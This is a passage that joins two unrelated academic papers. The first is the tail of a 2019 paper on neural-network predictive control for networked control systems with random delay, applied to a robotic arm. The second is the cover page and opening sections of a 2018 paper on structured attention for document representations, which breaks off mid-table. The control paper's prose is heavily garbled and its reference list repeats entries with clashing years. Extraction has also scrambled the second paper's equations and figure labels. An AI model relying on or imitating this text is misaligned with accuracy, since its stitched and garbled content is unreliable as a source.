multiplicative uncertainty bounded perturbation and provided the method of use robust control theory design of NCS controller in frequency domain. Studied robust passive control problem of class of long delay networked control systems in the literature [12], and derive the passive controller design method and proved the validity of the method through simulation. Short delay network control system disturbs by white noise in the literature[13], transformed impact of the random delay on the system into the unknown bounded uncertainties using robust control theory give the 2 /H H system state observer design method. Literature[14] make delay uncertainty convert to the perturbation of the closed-loop system parameters, propose the conditions for the existence of robust guaranteed cost control law based on the robust control theory and Lyapunov stability principle, and gives the method of design of network control Robust guaranteed cost state feedback controller to solve linear matrix inequality. Research show that actually adjust the controller parameters PID makes the instability of the closed-loop control system becomes stable and meet the requirements of remote control system which need less real-time demand. Modify PID parameters of the control system and set the network delay to 0.06s again get feedback curve shown in Figure 3.Research show that modify the PID control parameters has indeed improved the stability of the control system. Figure 3. Response after regulate PID parameters at 0.06 seconds time delay C. Question propose The adjustments of the PID control parameters need to be dynamic adjustment constantly with the size of the control system delay and values and other parameters of systems, which makes controlled object in the work environment unknown to dynamically adapt adjust PID values become remote intelligent control systems that are experiencing another problem. This paper based on the method of modify the control parameters of PID values to improve the stability of the remote control system, and propose intelligent remote control system design methods with adaptive function under a random delay based on neural network theory. III. QUESTION ANALYSIS Remote control single-link manipulator, set the sampling period in figure 1 is 0.05s, and take the delay value of 0.05s, the control information in time k transmitted to the controller after 0.05s, as opposed to the system sampling time 0.05s, the controller receives status information at the moment of k has pass a sampling point, the state of the system has become the state in time k +1, that is state of the k time fed back to the PID controller at time k +1, the PID controller for International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 33 time k, the state at time k+1 has not yet come, but this time system status values at k-1 after a sample time delay before it is passed controller, therefore, the controller can only decision at time k should be imposed control value u (k) based on the state of the k-1 times, and this control value can be a real work on the system after a time delay, while at the time k +1 and the state of the system has been turned into a time k+1 the state of X(k+1), while u (k) produce at the state time k-1, so u (k-1)grieved and u (k +1) required difference two sampling cycles. In these two sampling cycle, the state of the system state transition, that is x (k-1) transfer to the x (k+1), x (k-1) and x (k+1) often is different lead to u (k-1) and u (k +1) is different. In other word, the system control value produced offset and the greater delay the greater offset, which is the root source of result in deterioration of the system closed-loop control performance and even instability. The above analysis shows that the system performance deterioration caused by the remote network delay because of can not correctly calculate the amount of control exerted by the controller to the system ,if the system model is known and the size of delay is known, then forecast the state of system in accordance with the principle of the system predict compensation, and calculate the size of control value need to be added the control system in accordance with the predicted state, that is time k applications to predict the state   (k+1) at time k+1 yet not the state of x(k-1) at time k-1 calculation to be applied to the system state at time k, then the control value u (k +1) at actual time k +1, the u (k +1) after a delay transmission in the time k +1 transfer to the system just after a sampling period, the state of the system change into x (k +1) , So, if the predicted state   (k+1) is infinitely close to the actual state x (k +1), the performance of control network delay closed-loop control system can be infinitely close the performance of the closed-loop control system without delay links, which is the basic idea of the predictive control model. However, the delay of the control network is time-varying and controlled objects are often immediately confounding factors, it is can not use an inconvenience model to predict the state of system and can not use a specific delay time to do the fixed step predictive control, neural network has the advantages of online learning the state of the system, predictive control based on neural network has strong robustness to be adaptive to the change of system status and network delay aspects ,it is a way to solve the network latency closed-loop control. IV. BUILD THE MODEL PREDICTIVE CONTROL LAW According to the running state of the system over the past time and present moment, more accurate forecasting system desired output value in the future moment, calculated control value of the system should be added according to output value desired depending on certain optimization algorithm [15] is adaptive computer control of online solving control value [16], the method includes three steps: prediction model, rolling optimization and feedback correction[17]. A. The prediction model For a module description of the alleged object behavior in the predictive control based on neural network belong to forward model of system, there use the training methods as shown in Figure 4, where dashed box picture shows the actual controlled object, here is the simulink block diagram of the robotic arm, at random input signal u to produce output y. Selected BP neural network with one hidden layer as training model of a controlled object , set the number of hidden layer neurons is 10, using the Levenberg-Marquartdt learning rules, with the group [u, y] data training neural network model of the charged object, the results shown in Figure 5, where Figure 5 (a) is the data used for training, Figure 5 (b)is convergence diagram for training [18]. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 34 Figure 4. Neural Network Training Block Diagram of the Manipulator B. Receding Horizon Optimization Rolling optimization is an optimal control algorithm, which uses the output of the rolling finite domain optimization that is the goal of optimization over time. Predictive control proposes optimization index based on the moment in every time instead of using global optimization indexes. Rolling optimization index locality through make it can only get the global optimal solution in the ideal case, but when the model mismatch or time-varying and non-linear or confounding factors can take into account this uncertainty in a timely manner compensate, reducing the deviation, keeping the actual optimal control ,and it is also easy to use input/output value of finite difference time domain to identify rapidly the state of controlled object so as to implement the online adjustment to the control law and need for repeated optimization . (a) Data for Training (b) Convergence Diagram for Training Figure 5. Neural Network Model Training Results of Manipulator Optimization algorithm in this article also uses neural network to achieve, set the time-domain involved in the optimization value of 2, using the BP network neural of hidden layer neuron number 7, the same learning rule Levenberg-Marquartdt do the online training to achieve the control signal to the continuous optimization. Training block diagram is shown in the dashed box in Figure 4. Neural network optimization device in accordance with a given input signal u produce predictable output u1, u1 is imposed to the neural network model of the controlled object to produce predictable output y1, y1 compare with the desired output u of the system, and both the difference to train the neural network optimization. Then, the output u2 of the e2 enough litter as the actual amount of control applied to the actual controlled object. Visible, the optimizer in the regulation system is the inverse model of the charged object. Y1 can also be compared with actual output y2, and the error e1 and International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 35 the actual input u2 of charged object, output y2 as the data of training charged object neural network model. C. Feedback correction Feedback correction is forecast control to keep the dynamic correction forecasting model to ensure that the prediction model with infinitely close to the actual controlled object, and make optimization algorithm establish on the basis of the correct prediction of the system state then the new optimization. Error e1 in Figure 6 is the amendment process of the neural network model of the controlled object. Neural network prediction model is built on the basis of the past run data in system, the new operating environment and the actual system has the nonlinear, time-varying, interference and other factors make prediction model based on neural networks need to constantly learn to modify their weights and even structure to ensure that it can well represent the actual controlled object to a control signal prediction. V. SIMULATION ANALYSES Figure 6. Simulink Simulation of Network Closed-Loop Control System based on Predictive Neural Build the Simulation block diagram shown in Figure 6 under robotic arm Smulink environment, network training based on neural network predictive control by the steps in Figure 4-Figure5, and at the role of the same random input signal gradually adjust the value of delay to simulation. The results in Figure7 show that the prediction control based on neural network has a good control performance to the fixed delay network. Further used random delay module shown in Figure 8(a) instead of fixed delay module in Figure 5 immediately delay module for delay characteristics of input shown in Figure8 (b), where In.mat file stored random input signal in Figure 5.There are used random input signal stored in this file in order to compare the simulation results in the simulation. Finally, simulation under the random delay conditions and results shows in Figure8 (c). Whether a fixed delay or random delay neural network predictive controller can satisfy the closed-loop control requirements in the network delay conditions. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 36 (a) Response Curve delay 0.06s (b) Response Curve delay0.5s Figure 7. Predictive Control Random Responses Curve based on Neural Network (a) Delay Curve under Random Delay (b) Response Curve under Random Delay Figure 8. Responses under Random Delay VI. CONCLUSION This article discusses the difficulties of remote closed-loop control, that is different from the general control system of the difficulty lies in channel and feedback channel network of system existence uncertain delay which greatly reduces the stability of system and improve the design difficulty of control system. This paper elaborated network closed-loop control problems form uncertain network delay to includes network delay controller design method, and study the impact of network transmission delay on the network closed-loop control system, proposed by predictive control based on neural network to solve feasibility of the network control system which existence random delay closed-loop control, and verified the validity of the method by simulation. ACKNOWLEDGMENT The authors wish to thank the cooperators. This research is partially funded by the Project funds in. National Network Engineering Testing LabFund project(GSYSJ2018012). REFERENCES [1] Zhang Wei, Michael S,Branicky, Stephen M, Phillips, Stability of Networked Control Systems[J], IEEE Control Systems Magazine February,2001,(21):84-99. [2] Almutairi Naif B, Chow Moyuen, PI Parameterization Using Adaptive Fuzzy Modulation (AFM) for Networked Control Systems-Part I: Partial Adaptation [J].IEEE Proceedings of IECON 2008, Sevilla，Spain，2008. 3152-3157. [3] Goodwin C, Juan Carlos Aguero,Arie Feuer, State Estima2tion for Systems Having Random Measurement Delays UsingErrors in Variables[C], The 15th Triennial World Congress Barcelona, Spain, 2002. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 37 [4] Lee Kyung Chang,Lee Suk, Remote Controller Design of Networked Control System Using Genetic Algorithm[C], ISIE 2007, Pusan, KOREA in IEEE, 2007: 1845-1850. [5] Huang J Q, Lew is FL, Liu K A, Neural predictive control for telerobot swith time delay [J]. Journal of Intelligent and Robotic System s, 2000, 29:1- 25. [6] Lian Fengli Analysis, Design, Modeling, and Control of Networked Control Systems[D], Ph.D. thesis, The University of Michigan, 2001. [7] FerrelW R.Remote manipulation with transmission delay[J]. IEEE Transaction on Human Factors in Electronics, 1965,FE6-(1):24-32. [8] Halevi Y, Ray A.Integrated communication and control systems; Part I analysis[J]. Journal of Dynamic Systems Measurement and control, 1988,110(4):367-373. [9] Walsh G C,Beldiman O,Bushnell L G. A symptotic behavior of nonlinear networked control systems[J]. IEEE Transactions on Automatic Control, 2001,46(7):1093-1097. [10] Gregory C Walsh,Octavian Beldiman,Linda Bushnell.Error encoding algorithms for networdked control systems[C]. Proceedings of the 38th Conference on Decision and Control Phoenix, 1999,5:4933-4938. [11] Göktas F.Distributed control of systems over communication networks[D]. Ph.D Dissertion. Philadelphia, PA, USA:University of Pennsylvania,2000. [12] Sun Haiyi, Li Ning. Robust passive control of long delay network control system [J]. Computing Technology and Automation, 2007, 26 (4) :5-8. [13] Zhu Zhangqing, Zhou Chuan, Hu Weili. Robust HH state observer design of short delay network control systems[J]. Control and Decision, 2005,20 (3) [14] Zhang Ximin, Li Jiandong, Zhang Jianguo. Robust guaranteed cost control of network control systems [J]. Xi'an Electronic Technology University, 2008, 35 (1):96-100. [15] Huang J Q , Lew is FL, Liu K A, Neural predictive control for telerobot swith time delay [J]. Journal of Intelligent and Robotic System s, 2008, 29:1- 25. [16] Chen, S, C.F.N. Cowan, and P.M. Grant, Orthogonal Least Squares Learning Algorithm for Radial Basis Function Networks[J], IEEE Transactions on Neural Networks, 1991(2): 302-309. [17] Huang J Q, Lew is FL, Liu K A, Neural predictive control for telerobot swith time delay[J]. Journal of Intelligent and Robotic System s, 2000,29:1- 25. [18] Chen, S, C.F.N. Cowan, and P.M. Grant, Orthogonal Least Squares Learning Algorithm for Radial Basis Function Networks, IEEE Transactions on Neural Networks, 1991(2): 302-309. work_fnpfl6ausndjxf26tx3wnlmpl4 ---- Edinburgh Research Explorer Learning Structured Text Representations Citation for published version: Liu, Y & Lapata, M 2018, 'Learning Structured Text Representations', Transactions of the Association for Computational Linguistics, vol. 6, pp. 63-76. <https://transacl.org/ojs/index.php/tacl/article/view/1185> Link: Link to publication record in Edinburgh Research Explorer Document Version: Publisher's PDF, also known as Version of record Published In: Transactions of the Association for Computational Linguistics General rights Copyright for the publications made accessible via the Edinburgh Research Explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. Take down policy The University of Edinburgh has made every reasonable effort to ensure that Edinburgh Research Explorer content complies with UK legislation. If you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. Download date: 06. Apr. 2021 https://transacl.org/ojs/index.php/tacl/article/view/1185 https://www.research.ed.ac.uk/portal/en/publications/learning-structured-text-representations(8cfe7cfc-1bee-4bb2-89bd-87c6d7e94b3e).html Learning Structured Text Representations Yang Liu and Mirella Lapata Institute for Language, Cognition and Computation School of Informatics, University of Edinburgh 10 Crichton Street, Edinburgh EH8 9AB yang.liu2@ed.ac.uk,mlap@inf.ed.ac.uk Abstract In this paper, we focus on learning structure- aware document representations from data without recourse to a discourse parser or addi- tional annotations. Drawing inspiration from recent efforts to empower neural networks with a structural bias (Cheng et al., 2016; Kim et al., 2017), we propose a model that can en- code a document while automatically induc- ing rich structural dependencies. Specifically, we embed a differentiable non-projective pars- ing algorithm into a neural model and use at- tention mechanisms to incorporate the struc- tural biases. Experimental evaluations across different tasks and datasets show that the pro- posed model achieves state-of-the-art results on document modeling tasks while inducing intermediate structures which are both inter- pretable and meaningful. 1 Introduction Document modeling is a fundamental task in Natural Language Processing useful to various downstream applications including topic labeling (Xie and Xing, 2013), summarization (Chen et al., 2016; Wolf and Gibson, 2006), sentiment analysis (Bhatia et al., 2015), question answering (Verberne et al., 2007), and machine translation (Meyer and Webber, 2013). Recent work provides strong evidence that better document representations can be obtained by incor- porating structural knowledge (Bhatia et al., 2015; Ji and Smith, 2017; Yang et al., 2016). Inspired by ex- isting theories of discourse, representations of docu- ment structure have assumed several guises in the lit- erature, such as trees in the style of Rhetorical Struc- ture Theory (RST; Mann and Thompson, 1988), graphs (Lin et al., 2011; Wolf and Gibson, 2006), entity transitions (Barzilay and Lapata, 2008), or combinations thereof (Lin et al., 2011; Mesgar and Strube, 2015). The availability of discourse anno- tated corpora (Carlson et al., 2001; Prasad et al., 2008) has led to the development of off-the-shelf discourse parsers (e.g., Feng and Hirst, 2012; Liu and Lapata, 2017), and the common use of trees as representations of document structure. For example, Bhatia et al. (2015) improve document-level senti- ment analysis by reweighing discourse units based on the depth of RST trees, whereas Ji and Smith (2017) show that a recursive neural network built on the output of an RST parser benefits text categoriza- tion in learning representations that focus on salient content. Linguistically motivated representations of doc- ument structure rely on the availability of anno- tated corpora as well as a wider range of standard NLP tools (e.g., tokenizers, pos-taggers, syntactic parsers). Unfortunately, the reliance on labeled data, which is both difficult and highly expensive to pro- duce, presents a major obstacle to the widespread use of discourse structure for document modeling. Moreover, despite recent advances in discourse pro- cessing, the use of an external parser often leads to pipeline-style architectures where errors propagate to later processing stages, affecting model perfor- mance. It is therefore not surprising that there have been attempts to induce document representations di- rectly from data without recourse to a discourse parser or additional annotations. The main idea is 63 Transactions of the Association for Computational Linguistics, vol. 6, pp. 63–75, 2018. Action Editor: Bo Pang. Submission batch: 5/2017; Published 1/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. to obtain hierarchical representations by first build- ing representations of sentences, and then aggre- gating those into a document representation (Tang et al., 2015a,b). Yang et al. (2016) further demon- strate how to implicitly inject structural knowledge onto the representation using an attention mecha- nism (Bahdanau et al., 2015) which acknowledges that sentences are differentially important in differ- ent contexts. Their model learns to pay more or less attention to individual sentences when constructing the representation of the document. Our work focus on learning deeper structure- aware document representations, drawing inspira- tion from recent efforts to empower neural networks with a structural bias (Cheng et al., 2016). Kim et al. (2017) introduce structured attention networks which are generalizations of the basic attention pro- cedure, allowing to learn sentential representations while attending to partial segmentations or subtrees. Specifically, they take into account the dependency structure of a sentence by viewing the attention mechanism as a graphical model over latent vari- ables. They first calculate unnormalized pairwise at- tention scores for all tokens in a sentence and then use the inside-outside algorithm to normalize the scores with the marginal probabilities of a depen- dency tree. Without recourse to an external parser, their model learns meaningful task-specific depen- dency structures, achieving competitive results in several sentence-level tasks. However, for docu- ment modeling, this approach has two drawbacks. Firstly, it does not consider non-projective depen- dency structures, which are common in document- level discourse analysis (Hayashi et al., 2016; Lee et al., 2006). As illustrated in Figure 1, the tree struc- ture of a document can be flexible and the depen- dency edges may cross. Secondly, the inside-outside algorithm involves a dynamic programming process which is difficult to parallelize, making it impracti- cal for modeling long documents.1 In this paper, we propose a new model for rep- resenting documents while automatically learning richer structural dependencies. Using a variant of Kirchhoff’s Matrix-Tree Theorem (Tutte, 1984), our model implicitly considers non-projective depen- 1In our experiments, adding the inside-outside pass in- creases training time by a factor of 10. 1 The next time you hear a Member of Congress moan about the deficit, consider what Congress did Friday. 2 The Senate, 84-6 ,voted to increase to $124,000 the ceiling on insured mortgages from the FHA, which lost $4.2 billion in loan defaults last year. 3 Then , by voice vote , the Senate voted a porkbarrel bill, approved Thursday by the House, for domestic military construction. 4 The Bush request to what the Senators gave themselves. 1 2 3 4 Figure 1: The document is analyzed in the style of Rhetorical Structure Theory (Mann and Thompson, 1988), and represented as a dependency tree fol- lowing the conversion algorithm of Hayashi et al. (2016). dency tree structures. We keep each step of the learning process differentiable, so the model can be trained in an end-to-end fashion and induce dis- course information that is helpful to specific tasks without an external parser. The inside-outside model of Kim et al. (2017) and our model both have a O(n3) worst case complexity. However, major operations in our approach can be parallelized ef- ficiently on GPU computing hardware. Although our primary focus is on document modeling, there is nothing inherent in our model that prevents its ap- plication to individual sentences. Advantageously, it can induce non-projective structures which are re- quired for representing languages with free or flexi- ble word order (McDonald and Satta, 2007). Our contributions in this work are threefold: a model for learning document representations whilst taking structural information into account; an effi- cient training procedure which allows to compute document level representations of arbitrary length; and a large scale evaluation study showing that the proposed model performs competitively against strong baselines while inducing intermediate struc- tures which are both interpretable and meaningful. 2 Background In this section, we describe how previous work uses the attention mechanism for representing individual sentences. The key idea is to capture the interaction between tokens within a sentence, generating a con- text representation for each word with weak struc- tural information. This type of intra-sentence at- tention encodes relationships between words within 64 u1 u2 u3 u4 u5 a41 a42 a43 a45 r4r1 r2 r3 r5 Figure 2: Intra-sentential attention mechanism; aij denotes the normalized attention score between tokens ui and uj. each sentence and differs from inter-sentence at- tention which has been widely applied to sequence transduction tasks like machine translation (Bah- danau et al., 2015) and learns the latent alignment between source and target sequences. Figure 2 provides a schematic view of the intra- sentential attention mechanism. Given a sen- tence represented as a sequence of n word vectors [u1,u2, · · · ,un], for each word pair 〈ui,uj〉, the attention score aij is estimated as: fij = F(ui,uj) (1) aij = exp(fij)∑n k=1 exp(fik) (2) where F() is a function for computing the unnor- malized score fij which is then normalized by cal- culating a probability distribution aij. Individual words collect information from their context based on aij and obtain a context representation: ri = n∑ j=1 aijuj (3) where attention score aij indicates the (dependency) relation between the i-th and the j-th-words and how information from uj should be fed into ui. Despite successful application of the above atten- tion mechanism in sentiment analysis (Cheng et al., 2016) and entailment recognition (Parikh et al., 2016), the structural information under considera- tion is shallow, limited to word-word dependencies. Since attention is computed as a simple probabil- ity distribution, it cannot capture more elaborate structural dependencies such as trees (or graphs). Kim et al. (2017) induce richer internal structure by imposing structural constraints on the probabil- ity distribution computed by the attention mecha- nism. Specifically, they normalize fij with a pro- jective dependency tree using the inside-outside al- gorithm (Baker, 1979): fij = F(ui,uj) (4) a = inside-outside(f) (5) ri = n∑ j=1 aijuj (6) This process is differentiable, so the model can be trained end-to-end and learn structural information without relying on a parser. However, efficiency is a major issue, since the inside-outside algorithm has time complexity O(n3) (where n represents the number of tokens) and does not lend itself to easy parallelization. The high order complexity renders the approach impractical for real-world applications. 3 Encoding Text Representations In this section we present our document representa- tion model. We follow previous work (Tang et al., 2015a; Yang et al., 2016) in modeling documents hierarchically by first obtaining representations for sentences and then composing those into a document representation. Structural information is taken into account while learning representations for both sen- tences and documents and an attention mechanism is applied on both words within a sentence and sen- tences within a document. The general idea is to force pair-wise attention between text units to form a non-projective dependency tree, and automatically induce this tree for different natural language pro- cessing tasks in a differentiable way. In the follow- ing, we first describe how the attention mechanism is applied to sentences, and then move on to present our document-level model. 3.1 Sentence Model Let T = [u1,u2, · · · ,un] denote a sentence con- taining a sequence of words, each represented by a vector u, which can be pre-trained on a large cor- pus. Long Short-Term Memory Neural Networks (LSTMs; Hochreiter and Schmidhuber, 1997) have 65 u1 u2 u3 u4 d1 d2 d3 d4 e1 e2 e3 e4 Calculat e St ruct ured At t ent ion Updat e Sem ant ic Vect ors r1 r2 r3 r4 Figure 3: Sentence representation model: ut is the input vector for the t-th word, et and dt are semantic and structure vectors, respectively. been successfully applied to various sequence mod- eling tasks ranging from machine translation (Bah- danau et al., 2015), to speech recognition (Graves et al., 2013), and image caption generation (Xu et al., 2015). In this paper we use bidirectional LSTMs as a way of representing elements in a se- quence (i.e., words or sentences) together with their contexts, capturing the element and an “infinite” window around it. Specifically, we run a bidirec- tional LSTM over sentence T , and take the output vectors [h1,h2, · · · ,hn] as the representations of words in T , where ht ∈ Rk is the output vector for word ut based on its context. We then exploit the structure of T which we in- duce based on an attention mechanism detailed be- low to obtain more precise representations. Inspired by recent work (Daniluk et al., 2017; Miller et al., 2016), which shows that the conventional way of us- ing LSTM output vectors for calculating both atten- tion and encoding word semantics is overloaded and likely to cause performance deficiencies, we decom- pose the LSTM output vector in two parts: [et,dt] = ht (7) where et ∈ Rkt , the semantic vector, encodes se- mantic information for specific tasks, and dt ∈ Rks , the structure vector, is used to calculate structured attention. We use a series of operations based on the Matrix- Tree Theorem (Tutte, 1984) to incorporate the struc- tural bias of non-projective dependency trees into the attention weights. We constrain the probabil- ity distributions aij (see Equation (2)) to be the posterior marginals of a dependency tree structure. We then use the normalized structured attention, to build a context vector for updating the semantic vector of each word, obtaining new representations [r1,r2, · · · ,rn]. An overview of the model is pre- sented in Figure 3. We describe the attention mech- anism in detail in the following section. 3.2 Structured Attention Mechanism Dependency representations of natural language are a simple yet flexible mechanism for encoding words and their syntactic relations through directed graphs. Much work in descriptive linguistics (Melc̆uk, 1988; Tesniére, 1959) has advocated their suitability for representing syntactic structure across languages. A primary advantage of dependency representations is that they have a natural mechanism for representing discontinuous constructions arising from long dis- tance dependencies or free word order through non- projective dependency edges. More formally, building a dependency tree amounts to finding latent variables zij for all i 6= j, where word i is the parent node of word j, un- der some global constraints, amongst which the single-head constraint is the most important, since it forces the structure to be a rooted tree. We use a variant of Kirchhoff’s Matrix-Tree Theorem (Koo et al., 2007; Tutte, 1984) to calculate the marginal probability of each dependency edge P(zij = 1) of a non-projective dependency tree, and this probabil- ity is used as the attention weight that decides how much information is collected from child unit j to the parent unit i. We first calculate unnormalized attention scores fij with structure vector d (see Equation (7)) via a bilinear function: tp = tanh(Wpdi) (8) tc = tanh(Wcdj) (9) fij = t T p Watc (10) where Wp ∈ Rks∗ks and Wc ∈ Rks∗ks are the weights for building the representation of parent and child nodes. Wa ∈ Rks∗ks is the weight for the bi- linear transformation. f ∈ Rn∗n can be viewed as 66 a weighted adjacency matrix for a graph G with n nodes where each node corresponds to a word in a sentence. We also calculate the root score fri , indi- cating the unnormalized possibility of a node being the root: fri = Wrdi (11) where Wr ∈ R1∗ks . We calculate P(zij = 1), the marginal probability of the dependency edge, fol- lowing Koo et al. (2007): Aij = { 0 if i = j exp(fij) otherwise (12) Lij = {∑n i′=1 Ai′j if i = j −Aij otherwise (13) L̄ij = { exp(fri ) i = 1 Lij i > 1 (14) P(zij = 1) = (1 − δ1,j)Aij[L̄−1]jj − (1 −δi,1)Aij[L̄−1]ji (15) P(root(i)) = exp(fir)[L̄ −1]i1 where 1 ≤ i ≤ n, 1 ≤ j ≤ n. L ∈ Rn∗n is the Laplacian matrix for graph G and L̄ ∈ Rn∗n is a variant of L that takes the root node into consid- eration, and δ is the Kronecker delta. The key for the calculation to hold is for Lii, the minor of the Laplacian matrix L with respect to row i and col- umn i, to be equal to the sum of the weights of all directed spanning trees of G which are rooted at i. P(zij = 1) is the marginal probability of the dependency edge between the i-th and j-th words. P(root(i) = 1) is the marginal probability of the i- th word headed by the root of the tree. Details of the proof can be found in Koo et al. (2007). We denote the marginal probabilities P(zij = 1) as aij and P(root(i)) as ari . This can be inter- preted as attention scores which are constrained to converge to a structured object, a non-projective de- pendency tree, in our case. We update the semantic vector ei of each word with structured attention: pi = n∑ k=1 akiek + a r i eroot (16) ci = n∑ k=1 aikei (17) ri = tanh(Wr[ei,pi,ci]) (18) where pi ∈ Rke is the context vector gathered from possible parents of ui and ci ∈ Rke the context vec- tor gathered from possible children, and eroot is a special embedding for the root node. The context vectors are concatenated with ei and transformed with weights Wr ∈ Rke∗3ke to obtain the updated semantic vector ri ∈ Rke with rich structural infor- mation (see Figure 3). 3.3 Document Model We build document representations hierarchically: sentences are composed of words and documents are composed of sentences. Composition on the doc- ument level also makes use of structured attention in the form of a dependency graph. Dependency- based representations have been previously used for developing discourse parsers (Hayashi et al., 2016; Li et al., 2014) and in applications such as summa- rization (Hirao et al., 2013). As illustrated in Figure 4, given a document with n sentences [s1,s2, · · · ,sn], for each sen- tence si, the input is a sequence of word embed- dings [ui1,ui2, · · · ,uim], where m is the number of tokens in si. By feeding the embeddings into a sentence-level bi-LSTM and applying the pro- posed structured attention mechanism, we obtain the updated semantic vector [ri1,ri2, · · · ,rim]. Then a pooling operation produces a fixed-length vec- tor vi for each sentence. Analogously, we view the document as a sequence of sentence vectors [v1,v2, · · · ,vn] whose embeddings are fed to a document-level bi-LSTM. Application of the struc- tured attention mechanism creates new semantic vectors [q1,q2, · · · ,qn] and another pooling oper- ation yields the final document representation y. 3.4 End-to-End Training Our model can be trained in an end-to-end fashion since all operations required for computing struc- tured attention and using it to update the semantic 67 u i1 u i2 u im y St ruct ured At t ent ion r i1 r i2 r im v1 vi vn q1 q i qn Pooling Pooling St ruct ured At t ent ion Figure 4: Document representation model. vectors are differentiable. In contrast to in Kim et al. (2017), training can be done efficiently. The major complexity of our model lies in the computation of the gradients of the the inverse matrix. Let A denote a matrix depending on a real parameter x; assuming all component functions in A are differentiable, and A is invertible for all possible values, the gradient of A with respect respect to x is: dA−1 dx = −A−1 dA dx A−1 (19) Multiplication of the three matrices and matrix in- version can be computed efficiently on modern par- allel hardware architectures such as GPUs. In our experiments, computation of structured attention takes only 1/10 of training time. 4 Experiments In this section we present our experiments for eval- uating the performance of our model. Since sen- tence representations constitute the basic building blocks of our document model, we first evalu- ate the performance of structured attention on a sentence-level task, namely natural language infer- ence. We then assess the document-level repre- sentations obtained by our model on a variety of classification tasks representing documents of dif- ferent length, subject matter, and language. Our code is available at https://github.com/ nlpyang/structured. 4.1 Natural Language Inference The ability to reason about the semantic relation- ship between two sentences is an integral part of text understanding. We therefore evaluate our model on recognizing textual entailment, i.e., whether two premise-hypothesis pairs are entailing, con- tradictory, or neutral. For this task we used the Stanford Natural Language Inference (SNLI) dataset (Bowman et al., 2015), which contains premise-hypothesis pairs and target labels indicat- ing their relation. After removing sentences with unknown labels, we obtained 549,367 pairs for train- ing, 9,842 for development and 9,824 for testing. Sentence-level representations obtained by our model (with structured attention) were used to en- code the premise and hypothesis by modifying the model of Parikh et al. (2016) as follows. Let [x p 1, · · · ,x p n] and [xh1, · · · ,xhm] be the input vectors for the premise and hypothesis, respectively. Appli- cation of structured attention yields new vector rep- resentations [rp1, · · · ,r p n] and [rh1, · · · ,rhm]. Then we combine these two vectors with inter-sentential attention, and apply an average pooling operation: oij = MLP(r p i ) T MLP(rhj ) (20) r̄ p i = [r p i , m∑ j=1 exp(oij)∑m k=1 exp(oik) ] (21) r̄hi = [r h i , m∑ i=1 exp(oij)∑m k=1 exp(okj) ] (22) rp = n∑ i=1 g(r̄ p i ), r h = m∑ i=1 g(r̄hi ) (23) where MLP() is a two-layer perceptron with a ReLU activation function. The new representa- tions rp,rh are then concatenated and fed into an- other two-layer perceptron with a softmax layer to obtain the predicted distribution over the labels. The hidden size of the LSTM was set to 150. The dimensions of the semantic vector were 100 and the dimensions of structure vector were 50. We used pretrained 300-D Glove 840B (Pennington et al., 2014) vectors to initialize the word embeddings. All parameters (including word embeddings) were up- dated with Adagrad (Duchi et al., 2011), and the 68 Models Acc θ Classifier with handcrafted features (Bowman et al., 2015) 78.2 — 300D LSTM encoders (Bowman et al., 2015) 80.6 3.0M 300D Stack-Augmented Parser-Interpreter Neural Net (Bowman et al., 2016) 83.2 3.7M 100D LSTM with inter-attention (Rocktäschel et al., 2016) 83.5 252K 200D Matching LSTMs (Wang and Jiang, 2016) 86.1 1.9M 450D LSTMN with deep attention fusion (Cheng et al., 2016) 86.3 3.4M Decomposable Attention over word embeddings (Parikh et al., 2016) 86.8 582K Enhanced BiLSTM Inference Model (Chen et al., 2017) 88.0 4.3M 175D No Attention 85.3 600K 175D Simple intra-sentence attention 86.2 1.1M 100D Structured intra-sentence attention with Inside-Outside 86.8 1.2M 175D Structured intra-sentence attention with Matrix Inversion 86.9 1.1M Table 1: Test accuracy on the SNLI dataset and number of parameters θ (excluding embeddings). Wherever available we also provide the size of the recurrent unit. Models Speed Max Avg No Attention 0.0050 0.0033 Simple Attention 0.0057 0.0042 Matrix Inversion 0.0070 0.0045 Inside-Outside 0.1200 0.0380 Table 2: Comparison of speed of different models on the SNLI testset. The unit of measurement is seconds per instance. All results were obtained on a GeForce GTX TITAN X (Pascal) GPU. learning rate was set to 0.05. The hidden size of the two-layer perceptron was set to 200 and dropout was used with ratio 0.2. The mini-batch size was 32. We compared our model (and variants thereof) against several related systems. Results (in terms of 3-class accuracy) are shown in Table 1. Most pre- vious systems employ LSTMs and do not incorpo- rate a structured attention component. Exceptions include Cheng et al. (2016) and Parikh et al. (2016) whose models include intra-attention encoding rela- tionships between words within each sentence (see Equation (2)). It is also worth noting that some models take structural information into account in the form of parse trees (Bowman et al., 2016; Chen et al., 2017). The second block of Table 1 presents a version of our model without an intra-sentential at- tention mechanism as well as three variants with at- tention, assuming the structure of word-to-word re- Dataset #class #docs #s/d #w/d Yelp 5 335K 8.9 151.6 IMDB 10 348K 14.0 325.6 CZ Movies 3 92K 3.5 51.2 Debates 2 1.6K 22.7 519.2 Table 3: Dataset statistics; #class is the number of classes per dataset, #docs denotes the number of documents; #s/d and #w/d represent the average number of sentences and words per document. lations and dependency trees. In the latter case we compare our matrix inversion based model against Kim et al.’s (2017) inside-outside attention model. Consistent with previous work (Cheng et al., 2016; Parikh et al., 2016), we observe that simple attention brings performance improvements over no attention. Structured attention further enhances performance. Our own model with tree matrix inversion slightly outperforms the inside-outside model of Kim et al. (2017), overall achieving results in the same ball- park with related LSTM-based models (Chen et al., 2017; Cheng et al., 2016; Parikh et al., 2016). Table 2 compares the running speed of the mod- els shown in the second block of Table 1. As can be seen matrix inversion does not increase running speed over the simpler attention mechanism and is considerably faster compared to inside-outside. The latter is 10–20 times slower than our model on the same platform. 69 Models Yelp IMDB CZ Movies Debates θ Feature-based classifiers 59.8 40.9 78.5 74.0 — Paragraph vector (Tang et al., 2015a) 57.7 34.1 — —- — Convolutional neural network (Tang et al., 2015a) 59.7 — — — — Convolutional gated RNN (Tang et al., 2015a) 63.7 42.5 — — — LSTM gated RNN (Tang et al., 2015a) 65.1 45.3 — — — RST-based recursive neural network (Ji and Smith, 2017) — — — 75.7 — 75D Hierarchical attention networks (Yang et al., 2016) 